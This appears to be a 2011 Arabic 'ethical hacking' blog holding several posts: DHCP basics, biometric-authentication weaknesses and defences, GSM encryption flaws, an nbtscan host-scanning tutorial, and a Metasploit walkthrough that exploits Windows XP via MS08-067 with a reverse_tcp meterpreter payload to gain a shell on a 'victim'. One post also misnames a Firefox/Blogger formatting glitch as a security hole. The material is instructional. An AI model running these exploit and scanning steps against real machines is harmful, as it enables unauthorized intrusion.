الأربعاء، 30 نوفمبر، 2011

شرح بروتوكول DHCP

بسم الله الرحمن الرحيم

شرح بروتوكول
DHCP



هو اختصار ل
 Dynamic Host Configuration Protocol
و يعني بالعربية : بروتوكول التشكيل الديناميكي

لماذا هذا البروتوكول : انه موجود لإعطاء عناوين للأجهزة بشكل ألي  و أوتوماتيكي بدلا من الطريقة اليدوية التي كانت تسبب بعض المشاكل
حيث أن الطريقة اليدوية كانت إذا أخطاء الشخص و أعطى أحد الأجهزة عنوان للجهاز أخر فان ذلك الجهاز يفصل مباشرة عن الاتصال لذلك جاء هذا البروتوكول ليحل هذه المشكلة و يعطي الأجهزة عناوين بشكل ألي بحيث يضمن أن لا تتشابه عناوين الأجهزة في الشبكة .


هذا البروتوكول يعمل كنموذج
Client / server

لا سيما أن الخوادم لا تقوم بهذه الأعمال إلا إذا أعدت للقيام بذلك العمل .

يوزع هذا البروتوكول العناوين بعدة أشكال منها التوزيع الآلي و الديناميكي و الدوري.
للمزيد حول هذه الأنواع اتبع الرابط هنا


آلية العمل :
تمر هذه العملية بأربعة مراحل و هي كالتالي
الاستكشاف
العرض
الطلب
الإقرار

 عندما يريد جهاز أن يطلب عنوان له فانه يستخدم العنوان التالي كعنوان للوجهة أو المستقبل
255.255.255.255
و يستخدم أيضا العنوان التالي عنوان للمصدر أي له ليقوم فقط بعملية إرسال طلب عنوان 
0.0.0.0
و يرسل بذلك رسالة طلب عنوان من المخدم فيرد المخدم برسالة أخرى تتضمن عدة أمور منها العنوان المعروض و عنوان المخدم
و بذلك يرد العميل برسالة فيها عنوان المخدم إذا وافق على العنوان المعروض و أخيرا يتم إقرار هذا العنوان لذلك العميل الذي طلب العنوان إذا كان متاحا أما إذا كان غير متاح فانه يرد ردا أخرا مما يجعل العمل ينتظر عرضا أخر للحصول على عنوان و لكن ينتظر لفترة محدودة أما إذا لم يرسل له العنوان بعد تلك الفترة فانه يعيد طلبه لعنوان مرة أخرى .


مصادر و مراجع للمقالة :








المشاكل الأمنية في أنظمة الحماية التي تعتمد على المقاييس الحيوية (Biometrics) في التحقق من الشخصية


 
بسم الله الرحمن الرحيم






مقدمة :

استخدام المقاييس الحيوية في التحقق من الشخصية : هي أساليب آلية يتم فيها التعرف على شخص ما بالاعتماد على خصائصه الفسيولوجية أو السلوكية, هناك طرق عديدة حاليًا يتم فيها التعرف على الشخص .


لقد انتشرت أنظمة الحماية التي تعتمد على المقاييس الحيوية في الفترة الأخيرة في أغلب الشركات و المؤسسات و في الجامعات و الدوائر المختلفة
و ذلك لقدرة هذه الأنظمة على معرفة الشخصية الحقيقة و ليست تلك المنتحلة
و ذلك يرجع لخصائص في هذه الأنظمة تجعلها كذلك فهي تعتمد على سمات شخصية للمستخدم .

لقد انتشرت هذه الأنظمة بشكل كبير أيضا بسبب سهولة تعامل المستخدمين معا فهي أفضل من أن يقوم المستخدم بحفظ كلمة سر و أن يحافظ عليها و إلى غير ذلك من الأمور التقليدية التي كان لا يحبها المستخدم كثيرا.

و لكن هذه الأنظمة قد تكون عرضة لهجوم أمني مما يجعل من المهم جدا أن نجعل مثل هذه الأنظمة أكثر أمانا و أن نعمل دائما على تفادي أي أخطار أمنية في هذه الأنظمة .

في هذا البحث سوف أتحدث عن المشاكل الأمنية في أنظمة الحماية التي تعتمد على المقاييس الحيوية و زيادة الأمان فيها .







سوف نتحدث في هذا البحث عن ما يلي :

1. كيف تعمل أنظمة التحقق من الشخصية التي تعتمد على المقاييس الحيوية
2. الثغرات الأمنية في أنظمة التحقق من الشخصية التي تعتمد على المقاييس الحيوية .
3. زيادة الأمان في أنظمة التحقق من الشخصية التي تعتمد على المقاييس الحيوية.
4. الخلاصة و أخيرا المصادر و المراجع .



* كيف تعمل أنظمة التحقق من الشخصية التي تعتمد على المقاييس الحيوية

أولا : حتى يكون النظام قادر على التعرف على الأشخاص يجب عمل تسجيل لسمات و خصائص هؤلاء الأشخاص و يجب أن تتم عملية التسجيل في ظل حماية لأنها أهم من عملية التعرف فهي تعتبر الأساس في عملية التأكد من شخصية المستخدم .

ثانيا : المرحلة الثانية هي أن يقوم المستخدم بإدخال السمه الشخصية من خلال جهاز الإحساس

ثالثا : أن يقوم النظام باستخراج الملامح المميزة  للسمه , و ذلك لأن النظام إذا أراد أن يقارن كل البصمة مثلا فان ذلك قد يجعل النظام لا يتعرف على الشخص الحقيقي صاحب البصمة فعلا لذلك فهو يأخذ الملامح المميزة لتلك البصمة و يستخرجها .





رابعا : يتم استرجاع القالب المخزن في قواعد البيانات .

خامسا : يقارن النظام الملامح المخزنة مع المدخلة من قبل المستخدم و بذلك يحدد القبول أو الرفض , علما بأنه لا يشترط التطابق الكامل , و لكن بنفس الوقت على الهامش النظام أن لا يكون كبيرا أو صغيرا إلى درجة أنه قد يرفض الشخص الصحيح أو قد يقبل الشخص الخاطئ .



* الثغرات الأمنية في أنظمة التحقق من الشخصية التي تعتمد على المقاييس الحيوية

إن مثل هذه الأنظمة تعتبر عالية الأمان و لكنها لا تخلو من بعض المشاكل الأمنية التي قد تعرضها للخطر و تتلخص هذه المشاكل في الأمور التالية

أولا : أن يتم تقديم إدخال مزيف أو مزور لجهاز الإحساس :
مثل : قناع للوجه أو إصبع مزيف أو يد مزيفه أو توقيع مزيف (نسخة من التوقيع).

ثانيا : إرسال الإشارات المخزنة من إرسال سابق :
مثل : تسجيل سابق للصوت أو تسجيل سابق للبصمة .

ثالثا : استخراج الملامح المميزة عن طريق فيروسات أحصنه طروادة تقوم بإنتاج ملامح يحددها المهاجم .

رابعا : استبدال الملامح المميزة المستخرجة عن طريق دخول المهاجم إلى القناة التي تربط إدخال الملامح بالقاعدة المخزنة و خاصة إذا كانت الملامح المستخرجة ترسل عبر الانترنت لتتم مقارنتها .

خامسا : تحريف المقارنة : بحيث يقوم المهاجم بمهاجمة المخزنة لتقوم بإنتاج نتائج مطابقة للمدخلة .

سادسا : تغيير القالب المخزن : حيث يقوم المهاجم بمهاجمة قاعدة البيانات و تغييرها و خاصة إذا كانت قواعد البيانات موزعة على أكثر من خادم .

سابعا : الهجوم على القناة بين قاعدة البيانات و المرسل و استبدال القالب المرسل .

ثامنا : تحريف النتيجة النهائية : عادة لا يكون هذا النوع من الهجوم ممكننا لكن إذا كان ممكننا فان النظام يصبح عديم الفائدة .


زيادة الأمان في أنظمة التحقق من الشخصية التي تعتمد على المقاييس الحيوية : 

لزيادة درجة الأمان في مثل هذه الأنظمة ينبغي العمل على ما يلي :

أولا : استخدام عدة نماذج مثل أخذ بصمة الإصبع و العين معا ,
أو استخدام بصمة الإبهام و السبابة معا , أو أن تطلب من المستخدم أن يقوم بالإدخال أكثر من مرة .

ثانيا : استخدام وسائل متعددة : مثل استخدام كلمة مرور مع أحدى أنواع المقاييس الشخصية .

ثالثا : تحري الحيوية : مثل استخدام  وسائل تتأكد من أن المستخدم كائن حي مثل استكشاف خصائص الجسم الفيزيائية أو الكهربائية (مقاومته للكهرباء) و أيضا قياس إشارات الجسم الحي كضغط الدم و موجات الدماغ و إشارات القلب .

رابعا : الاستجابة : حيث أن النظام قد يطلب من المستخدم أن يفعل شيئا ما مثل أن يحرك رأسه أو أن يرمش بعينه و ما إلى ذلك من الأمور و تعتبر هذه الطريقة مرتبطة مع الطريقة السابقة .
خامسا : الاحتفاظ بالبيانات فبعض الأنظمة تقوم بحذف الصور بعد مقارنتها و لكن الاحتفاظ بهذه البيانات يصعب بعض أنواع الهجوم و يعقد العملية أكثر على المهاجم .

سادسا : العلامة المائية مثل تسجيل مصدر البيانات أو غير ذلك من الأمور التي قد تكون معروفة لدى المستخدم أو غير معروفة .

سابعا : التشفير و يتم هنا إما من خلال تشفير قواعد البيانات المخزنة أو أن تستخدم المقاييس حيوية مفتاحا لتشفير البيانات .


الخاتمة :

بعد معرفة الأخطار التي يمكن أن تتعرض لها أنظمة المقاييس الحيوية و معرفة طرق الحماية يمكننا باختصار أن نقول أن لا حماية 100% ليس فقط لهذا النظام و إنما لكل الأنظمة و لا ننسى أيضا أن هذه الأمور سريعة التغيير , فيمكن في أي لحظة أن يكتشف أحد ما سرا في مثل هذا الأنظمة يجعلها عرضة للهجوم في أي لحظة . لا يمكن اعتبارها أسلوبا مثاليا لأمن المعلومات و لكنها قد تفي بالغرض أحيانا , مع إتباع الأساليب الوقائية لمنع حدوث أي هجوم أو خطاء و إتباع كل ينتج من تقنيات جديدة قد تزيد من أمن المعلومات في هذه الأنظمة .
إن أمن هذه الأنظمة يمكن في البيئة التي سوف تطبق بها هذه الأنظمة فعندما يكون عندك عدد موظفين قليل ليس كما يكون مثلا العدد كبير أو غير ذلك من الأمور التي قد تعقد من المشكلة في حال حدوثها .







المصادر و المراجع :

(2006) fingerprintrec
    CHARACTERISTICS OF BIOMETRIC SYSTEMS

Papers to appear in biometrics (2011) vol. 67 , no. 3

الأحد، 27 نوفمبر، 2011

حصريا على مدونة الهكر الأخلاقي كتاب : A Bug Hunter’s Diary


بسم الله الرحمن الرحيم




حصريا على مدونة الهكر الأخلاقي كتاب :
كتاب: A Bug Hunter’s Diary

هذا الكتاب باللغة الانجليزية لقد تم توفيره هنا للهكر الأخلاقيين

يتحدث الكاتب في هذا الكتاب عن ثغرات قام باكتشافها هو شخصيا و تمكن من استغلالها حيث أن الكاتب يشرح كل هذه الأمور في هذا الكتاب

عدد الثغرات التي يتحدث عنها الكاتب هي 7 ثغرات يشرحها هي و استغلالها في 7 و حدات من الكتاب من الوحدة الثانية حتى الوحدة الثامنة .

و هذه هي محتويات هذا الكتاب

Chapter 1: Bug Hunting
Chapter 2: Back to the 90s
Chapter 3: Escape from the WWW Zone
Chapter 4: NULL Pointer FTW
Chapter 5: Browse and You're Owned
Chapter 6: One Kernel to Rule Them All
Chapter 7: A Bug Older Than 4.4BSD
Chapter 8: The Ringtone Massacre
Appendix A: Hints for Hunting
Appendix B: Debugging
Appendix C: Mitigation

أتمنى أن تستفيدوا من هذا الكتاب الرائع
حمل من الرابط التالي

و السلام عليكم و رحمة الله و بركاته

الجمعة، 25 نوفمبر، 2011

حصريا , ثغرة بين فير فوكس و مدونة بلوجر اكتشفتها الآن



بسم الله الرحمن الرحيم


ثغرة بين فير فوكس و مدونة  بلوجر اكتشفتها الآن  

في هذا المساء عندما كنت أنشر المقالات التي كتبتها من خلال متصفح فير فوكس 8 على مدونتي ظهرت معي بعض الأخطاء بعد ما نشرت الرسائل على المدونة و ذلك كما هو واضح في الصورة بدل أن تظهر أو مجموعة من الكلمات في المقالة ظهر معي كود و ليس أول مجموعة من الكلمات في المقالة التي كتبتها .





و لذلك رأيت أن شكل المدونة أصبح غير منسب لذلك فكرت و جربت عدة حلول فوجدت أن المشكلة تكمن من أنني استعملت متصفح فير فوكس عند نشري للمقالات .
يبدو أن هنالك خطاء ما بين فير فوكس و بلوجر جعل المقالات تظهر بهذا الشكل المزعج في المدونة
حتى بعد أن تصفحت المدونة من خلال متصفح قروم وجدت نفس المشكلة







 لم أكن اعرف أن السبب هو فير فوكس حتى قمت بتجربة تحرير الرسائل مرة أخرى من خلال متصفح قروم و نشرها مرة أخرى من خلال قروم فأصبحت المقالات تظهر بشكل طبيعي كما في الصورة




اذن سجل متصفح فير فوكس مصيبة كبيرة و ذلك لانه سوف يخسر مستخدميه الذين لديهم مدونات بلوجر و يريدون نشر الرسائل .

شاهد الفرق بالصورة بين نشر الرسائل في فير فوكس و قروم





هذه احدى المشاكل التي يعاني منها متصفح فير فوكس الشهير و اليوم اكتشفتها بنفسي راجيا من شركة فوكس تصحيح أخطائها إذا كانت تريد منا أن نستخدم هذا المتصفح .

تحية مني
Muha Hacker
لكم جميعا و السلام عليكم و رحمة الله و بركاته .



اختبار اختراق ويندوز XP عن طريق البورت 445


بسم الله الرحمن الرحيم




كما يعرف الجميع فان ويندوز
XP
قد تخلت عنه شركة مايكروسوفت و توقفت عن دعمه مما بسبب كثرة ثغراته التي أصبحت منتشرة بشكل كبير و منها هذه الثغرة الموجودة في أغلب الأجهزة من هذا النظام 

و أعرف أنها أصبحت ثغرة قديمة و لكن سوف أذكرها للذكرى هي و ثغرات أخرى في هذا الويندوز حتى نقول بعدها أننا نستطيع قراءة الفاتحة على روح المرحوم
XP
مع أننا طبعا بإمكاننا من الآن قراءتها  

سوف يكون الاختبار عن طريق مشروع الميتاسبلويت

أولا : نكتب في الشل في باك تراك
Msfconsole
و ذلك لفتح الميتاسبلويت




ثانيا : نختار الثغرة عن طريق كتابة الامر التالي :

 Use windows/smb/ms08_067_netapi




ثالثا : نختار البايلود و ذلك عن طريق الأمر التالي :

Set payload windows/meterpreter/reverse_tcp




رابعا : نضع عنوان الجهاز الذي نريد اختراقه و ذلك بالأمر التالي :

Set rhost 172.0.0.1





خامسا : نضع عنوان جهازنا (عنوان جهاز المهاجم) بالأمر التالي :

Set lhost 172.0.0.1

طبعا هذه العناوين و هميه قم بتغييرها حسب الأجهزة التي لديك .





سادسا : أكتب هذه الكلمة لتنفيذ الاستغلال أو الثغرة .

Exploit

و شاهد نجاح الاستغلال  بالصورة التالية :





الان يمكننا تطبيق أوامر
Meterpreter
لاستكمال عملية الاختراق مثلا يمكنك كتابة أمر
Shell
حيث سوف يعطيك شل من جهاز الضحية (يعني شاشة الدوس)

شاهد الصورة :





إذن لقد أصبحنا الآن على الجهاز و نستطيع التحكم بأشياء كثيرة .

لكن هذا لا يكفي أنا أعرف أنك تريد معرفة أوامر ال
Meterpreter
سوف أشرحها في الدرس القادم انتظرنا لتتعرف عليها .

و السلام عليكم و رحمة الله و بركاته






شرح أداة Nbtscan و معرفة البرامج التي تعمل على جهاز الضحية أو الهدف




بسم الله الرحمن الرحيم



أولا :
NetBIOS

هو أحد أنواع البروتوكولات من حزمة
TCP/IP
قامت مايكروسوفت بإضافته من أجل أن تتمكن الأجهزة من المشاركة والاتصال فيما بينها أو ما يسمى ب
Sharing

تعمل هذه الخدمة على البورتات التالية :

137 netbios name
138 netbios datagram
139 netbios session


ما نريد أن نوضحه في هذه المقالة هو أن هنالك أداة في نظام باك تراك اسمها
Nbtscan
هذه الأداة يمكن أن تستعمل لمسح عناوين ال
IP
و تعطيك الأداة معلومات أو ناتج فيه

عنوان الجهاز المصاب
و اسم المستخدم للجهاز
و عنوان الماك أدرس
و يمكن أيضا معرفة التطبيقات أو البرامج المثبتة على جهاز الضحية إذا كان مصابا بهذه الثغرة , و هذه طبعا معلومات مهمة جدا في أي اختراق

للدخول إلى هذه الأداة في نظام باك تراك اذهب للمسار التالي :
Backtrack | networking mapping | identify live host | nbtscan





لفحص شبكة أو مجموعة شبكات استخدم الأمر التالي :

Nbtscan 192.168.1.1 – 255

و هذا الأمر يعني أنك تريد فحص الأجهزة التي عناوينها هي من
192.168.1.1
إلى
192.168.1.255

و هذه تعتبر شبكة مكونة من مجموعة من الأجهزة كما يمكن أيضا زيادة عدد الشبكات التي تريد فحصها عن طريق التغيير في أرقام ال
IP Address



أما بالنسبة للأمر الثاني الذي يمكنك من معرفة عدد من التطبيقات التي على  جهاز الضحية أو الهدف هو الأمر التالي

Nbtscan -hv 192.168.1.1-254

كما يبدو واضحا في الصورة التالية



بعد شرح هذه الأداة عليك أن تعرف أن ويندوز مهدد من قبل هذه الثغرة التي تمكن المهاجم من استغلالها و الاختراق من خلال

و كيفية الاختراق من خلال هذه الثغرة سوف يوضح في مقالة أخرى إن شاء الله .

و السلام عليكم و رحمة الله و بركاته


الخميس، 24 نوفمبر، 2011

عيوب الحماية في GSM و امكانية اختراقها


بسم الله الرحمن الرحيم

عنوان المقالة : عيوب الحماية في
GSM


سوف أتحدث في هذه المقالة عن أحد الهجمات التي يمكن أن يتعرض لها

GSM

و ذلك بسبب بعض الافتراضات الأمنية الباطلة التي أوجدها الأشخاص الذين صمموا

GSM


سوف أذكر فقط أحد المخاطر و هو


عيوب التشفير : هنالك العديد من عيوب التشفير في

GSM

في ما يتعلق بالهاش

A3 , A8

كلاهما يعتمد على

Hash Function

يسمى

COMP128



COMP128

طور كتصميم سري و لكن فيما بعد تبين أنه ضعيف حيث أنه يمكن كسر تشفيره بواسطة 150.000 محاولة لذلك


المقصود ب 150.000 يعني

150.000 plaintext

يعني 150.000 نص أو كلمة يقوم المهاجم باختيارها و تجهيزها لذلك الغرض

و هذا يعني أن المهاجم يمكنه أن يصل إلى ال

SIM Card

و يحدد ال

Ki

خلال مدة 2 – 10 ساعات حسب سرعة بطاقة ال

SIM Card

لذلك فانه يمكن لأي من بائعي الأجهزة الخلوية و بطاقاتها أن يقوم بتحديد ال

Ki

قبل عملية بيع

SIM Card

 إلى المشتري و بذلك يمكن للبائع أن يقوم بعمل نسخة ل

SIM Card

و يجري اتصالات على حساب المشتري .


و لكن لا يفعل ذلك إلا بائعي الأجهزة الخلوية الأشرار إذا صح التعبير .



حقيقة هذا الموضوع عميق جدا و يتطلب فهم لأمور كثيرة و لكن لن أنهي المقالة هنا حتى أذكر باقي عيوب التشفير و لكنني لن أوضحها و سأكتفي بوضع روابط لها لأنها تحتاج لجهد كبير حتى أشرحها في مقالة كهذه .


هنالك في الحقيقة شكلان مختلفان من التشفير بطريقة خوارزمية

A5

و هما يعرفان بخوارزمية

A5/1

و خوارزمية

A5/2


خوارزمية

A5/1

و

COMP128

كلاهما ضعيفين و يمكن توضيح ذلك من خلال هجوم عملي و معروف في التقرير التالي :



أما بالنسبة ل

A5/2

فهو أيضا ضعيف و ليس كما يعتقد الكثير من الناس و توضيح ذلك يأتي هنا




هاذين الرابطين لنفس الموضوع :




هكذا أكون وضحت عيوب التشفير في

GSM


و أيضا يمكنك الاطلاع على مقالة سابقة كتبتها في مدونتي عن عيب أخر في

GSM

يتعلق باختراق

SIM Card

بطريقة أخرى يمكنك الاطلاع على الموضع من هذا الرابط على مدونتي




تعتبر هذه مقالة مبسطة عن موضوع لا نتحدث عنه كثيرا في مواقعنا العربية يمكن أن تكون بداية لتوضيح كل هذه الأمور و وضعها باللغة العربية في المواقع العربية .


و هنالك مخاطر أخرى يتعرض لها نظام

GSM

سوف أذكرها ذكر فقط و لن أشرحها و هي :


SIM attack

و هي مشروحة في مقالتي على المدونة من هنا 


Fake base station

و هي القاعدة المزيفة التي يقوم بعملها الهاكر بدل قاعدة الشركة و يقوم بالاختراق من خلالها .

و هذه صورة لها توضح مكانها الذي يأتي بالوسط بين القاعدة الحقيقة و الجهاز الخلوي  :
  


كان هذا شرحا لمخاطر تتعرض لها

GSM

و أتمنى أن تكون نالت اعجابك .







Twitter Delicious Facebook Digg Stumbleupon Favorites More